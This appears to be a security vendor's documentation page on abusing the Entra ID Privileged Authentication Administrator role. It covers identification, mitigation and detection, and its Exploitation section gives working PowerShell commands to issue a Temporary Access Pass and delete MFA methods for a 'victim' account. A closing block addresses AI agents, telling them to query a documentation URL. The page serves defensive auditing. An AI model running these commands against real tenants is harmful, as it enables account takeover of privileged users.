# AZ\_PRIVILEGED\_AUTH\_ADMIN ## Summary | | | | ----------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | **FSProtect ACL Alias** | AZ\_PRIVILEGED\_AUTH\_ADMIN | | **Entra ID (Azure AD) Alias** | Privileged Authentication Administrator | | **Affected Object Types** | Users and their authentication methods (MFA methods, password reset / re-register flags, Temporary Access Pass) | | **Exploitation Certainty** | Certain | | **Graph Permission / Role** | Membership in the **Privileged Authentication Administrator** directory role (direct assignment or via a role-assignable group). Similar capability can also be obtained through Microsoft Graph permissions that allow managing user authentication methods (for example `UserAuthenticationMethod.ReadWrite.All`) | ## Description `AZ_PRIVILEGED_AUTH_ADMIN` represents the ability for a principal to operate as a **Privileged Authentication Administrator** in Microsoft Entra ID. This role can manage **authentication methods** for users. It can view, set, and reset authentication method information. It is commonly used for MFA recovery and onboarding scenarios. By using this role against a target user, an attacker can: * Reset or remove authentication methods and force re-registration for MFA. * Create a **Temporary Access Pass (TAP)** to bootstrap new authentication methods. * Take over accounts by weakening or re-binding authentication factors, including privileged accounts. Therefore, any identity that holds the Privileged Authentication Administrator role can quickly escalate privileges by taking control of authentication methods for sensitive users. ## Identification ### PowerShell (Microsoft Graph) List all members of the **Privileged Authentication Administrator** role. If a group is assigned, expand it to identify effective users. ```powershell Connect-MgGraph -Scopes "RoleManagement.Read.Directory","Directory.Read.All" # Privileged Authentication Administrator role template ID $roleId = "7be44c8a-adaf-4e2a-84d6-ab2649e08a13" Get-MgRoleManagementDirectoryRoleAssignment -Filter "roleDefinitionId eq '$roleId'" -ExpandProperty Principal | ForEach-Object { [PSCustomObject]@{ PrincipalType = $_.Principal.AdditionalProperties.'@odata.type'.Split('.')[-1] DisplayName = $_.Principal.AdditionalProperties.displayName PrincipalId = $_.PrincipalId Scope = $_.DirectoryScopeId } } | Format-Table -AutoSize ``` ### Azure GUI 1. Open **Microsoft Entra admin center** -> **Roles & administrators**. 2. Search and open **Privileged Authentication Administrator**. 3. Open **Assignments** and record: * **Active assignments** * **Eligible assignments** (if PIM is enabled) 4. If a **group** is assigned: * Enumerate its **transitive members** (nested included). 5. For sensitive users: * Go to **Users** -> select a user -> **Authentication methods**. * Confirm who in the tenant is authorized to manage these settings. ## Exploitation A Privileged Authentication Administrator can take control of a user’s authentication methods. This is a high-impact account takeover path. ### PowerShell (Microsoft Graph) **Create a Temporary Access Pass (TAP) for a target user:** ```powershell Connect-MgGraph -Scopes "UserAuthenticationMethod.ReadWrite.All" $userId = "victim@contoso.com" New-MgUserAuthenticationTemporaryAccessPassMethod -UserId $userId -BodyParameter @{ lifetimeInMinutes = 60 isUsableOnce = $false } | Select Id,TemporaryAccessPass,LifetimeInMinutes,CreatedDateTime ``` ![Create a Temp Access Pass](/files/bNxonj3gk7ZRbvrYt6JB) **List and delete existing authentication methods:** ```powershell # List all auth methods for a user $userId = "victim@contoso.com" Get-MgUserAuthenticationMethod -UserId $userId | Select Id,@{N='Type';E={$_.AdditionalProperties.'@odata.type'.Split('.')[-1]}} # Delete a specific phone method (forces re-registration) $phoneMethodId = "" Remove-MgUserAuthenticationPhoneMethod -UserId $userId -PhoneAuthenticationMethodId $phoneMethodId # Delete Microsoft Authenticator app method $authAppId = "" Remove-MgUserAuthenticationMicrosoftAuthenticatorMethod -UserId $userId -MicrosoftAuthenticatorAuthenticationMethodId $authAppId ``` ![List all auth methods for a user](/files/EVBKh5HMhIm9ZH7JZGJ0) ### Common Abuse Patterns * Forcing the user to re-register for MFA and removing existing authentication methods. * Creating a **Temporary Access Pass (TAP)** for the user and using it to enroll new factors. * Targeting privileged users to gain administrative access. ## Mitigation * Keep **Privileged Authentication Administrator** assignments minimal. * Use **PIM**: * Prefer **eligible** assignments instead of permanent active assignments. * Require MFA and approvals for activation where appropriate. * Apply strong protections to privileged users: * Phishing-resistant MFA for admins. * Conditional Access policies for administrative roles. * Restrict who can manage authentication methods: * Use least-privilege roles (Authentication Administrator vs Privileged Authentication Administrator) where possible. * Monitor and review role membership regularly and remove unused assignments. ## Detection Monitor Entra **Audit logs** for authentication method actions and role activity. ### PowerShell (Microsoft Graph) ```powershell Connect-MgGraph -Scopes "AuditLog.Read.All" # Detect TAP creation and auth method changes Get-MgAuditLogDirectoryAudit -Filter "category eq 'UserManagement'" -Top 100 | Where-Object { $_.ActivityDisplayName -match 'Admin registered temporary access pass|Admin deleted|Admin updated authentication' } | Select ActivityDateTime,ActivityDisplayName, @{N='Actor';E={$_.InitiatedBy.User.UserPrincipalName ?? $_.InitiatedBy.App.DisplayName}}, @{N='Target';E={$_.TargetResources[0].UserPrincipalName}} | Format-Table -AutoSize ``` ### Alert Criteria * Alert on: * Authentication methods removed or reset for privileged users. * Temporary Access Pass created for privileged users. * “Re-register MFA” and similar recovery actions triggered unexpectedly. * New assignments or activations of Privileged Authentication Administrator (especially via PIM). * Investigate: * **Initiated by (actor)** * **Target user** * Source IP / device context if available * Change ticket correlation (if applicable) ## References * * * * * * --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.forestall.io/fsprotect/edges/azure/az_privileged_auth_admin.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.